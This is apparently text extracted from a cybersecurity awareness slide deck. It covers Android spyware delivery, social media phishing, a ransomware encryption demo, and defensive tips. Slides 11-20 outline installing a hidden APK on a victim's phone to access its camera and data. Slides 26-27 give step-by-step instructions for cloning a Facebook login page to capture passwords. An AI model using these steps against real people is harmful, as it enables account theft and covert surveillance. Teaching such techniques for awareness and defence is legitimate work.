  • 11. Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via appending/email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
  • 12. Mobile Hacking (Note : Only For Educational Purpose.) • On Hacker side the following shell will appear and wait for listening connection:
  • 13. Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears):
  • 14. Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears): write help will show the command to use victim cell data. The installed apk hide it, no icons can seen on the screen
  • 15. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo shows the device information as follows:
  • 16. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
  • 17. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
  • 18. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo camList, takepic and vibrate shows as follows:
  • 19. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo, camList, ip shows Output as follows:
  • 20. Mobile Hacking (Note : Only For Educational Purpose.) • The output of SIM information as follows:
  • 21. Social Media Hack (Facebook, Twitter, Instagram etc.) • Background: Client/Server Architecture Clients Server 1. Client side Threats 2. Server side Threats 3. Network Threats
  • 22. Social Media Hack (Facebook, Twitter, Instagram etc.) Email Spoofing & Phishing Attack • Uses a fake email address or simulates a genuine one in order to deceive user • Redirect user to webpage that looks like a social media page • Records the login information inputted, may attempt to download malware or perform XSS • According to Kapersky 1 in 5 Phishing Scams include Facebook Hacking FB Accounts Using Tabnapping.
  • 23. Social Media Hack (Facebook, Twitter, Instagram etc.) • Domain Name System (DNS): In Simple World • DNS map the Host Name with IP address, There are 13-root name servers in the world. DNS are placed on different regions world-wide. Host name ping as follows:
  • 24. Social Media Hack (Facebook, Twitter, Instagram etc.) • In Windows, the file will be located under C:WindowsSystem32driversetc.
  • 25. Social Media Hack (Facebook, Twitter, Instagram etc.) • WireShark tool is used to capture packets. let's see the traffic on the packet level: We have an IP address of 192.168.10.19, which is the IP address of our attacker
  • 26. Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 1: First, we need to set up a phishing page. first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Then, make sure that you choose a complete page from the drop-down menu. The output should be an .html file. Rename the Facebook HTML page index.html. Step 2: Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST.
  • 27. Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 3: Next, we will create the passwords.txt file, where the target credentials will be stored. Step 4: Now, we will copy all of these files into varwww and start the Apache services. If we open the index.html page locally, we will see that this is the phishing page that the target will see. Open the browser and navigate to http://www.facebook.com/: Now, log into your Facebook account using your username and password. and jump on the folder and see if we get anything on the passwords.txt file.
  • 28.
  • 29. Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account
  • 30. Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account • Don’t click any links on an email unless you can guarantee who its from. • Use a trusted method of contacting the company via a phone number, app or website. • Mark the email as spam and contact the organisation.
  • 31. Ransomware Attack Background • Normally loaded onto a computer via a download/attachment/link from an email or website. • Will either lock the screen or encrypt your data. • Once Ransomware is uploaded on your computer/tablet/phone it is very difficult to remove without removing all of the data • Wannacry attack 2017 - One of the biggest cyber attacks to occur. • Is said to have hit 300,000 computers in 150 countries. • Companies affected include; K-electric, Life insurance company, NHS, Renault, FedEx, Spanish telecoms and gas companies, German railways etc. An Hacker Encrypt your data and demand ransom in the form of Bitcoins to decrypt back.
  • 32. Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
  • 33. Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
  • 34. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
  • 35. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
  • 36. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after Encryption, the file inside the folder can’t be readable.
  • 37. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable now.
  • 38. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable again.
  • 39. How to tackle Ransomware • Back up- Keep a backed up copy of your data. Ensure its not permanently connected to the network. • Patch- Keep your software up to date. Wannacry was successful as those affected computers hadn’t updated. The update contained a fix for the problem. • Attachments- Don’t click on links from emails/SMS as this could easily be from an untrusted source and contain malware like Ransomware
  • 40. Public Wi-Fi • May not be trustworthy. They could share your information to other companies who operate in countries without any data protection. • You may not know who is watching you whilst you’re online. What to do and not do to • Don’t use online banking. Use your own data. • Don’t conduct any purchases • Use a virtual private network (VPN)
  • 41.
  • 42.
  • 43.
  • 44. CYBER SECURITY Tips Tips for protecting yourself from cybersecurity threats in 2023: Password Policy Use strong passwords and change them regularly. Information Sharing vigilant Be careful about what information you share online. Firewall and Antivirus Install a firewall and antivirus software. Systems & software Keep your systems and software up to date. Unknown link and Attachments Don't click on links or open attachments from unknown senders. Data Backup Back up your data regularly. Lastly be aware of the latest cybersecurity threats.
  • 45. Passwords Advice • Use 1 password per account. • Three random words use. Like Capitals, special characters and numbers is your own choice. • If you follow this advice your passwords security will be significantly increased against a brute force attack. • Password managers can be helpful to store your passwords.
  • 46. Advice • In the physical world we’re good at protecting ourselves and our property, we need to replicate this in the digital world. • 80% of cyber-crime is preventable.
  • 47. Advice • Update and migrate • Activate your firewall • Staff awareness • Data encryption • User accounts privileges i.e admin • Cyber insurance • Prepare Plan
  • 48. You are the best defence! • Technology is only a small part of Cyber Defence • You are the most important person – protect yourself • For any businesses the most important and best defence is Cyber Security Aware employees – train your staff Always be aware! Always be on your guard! THANK YOU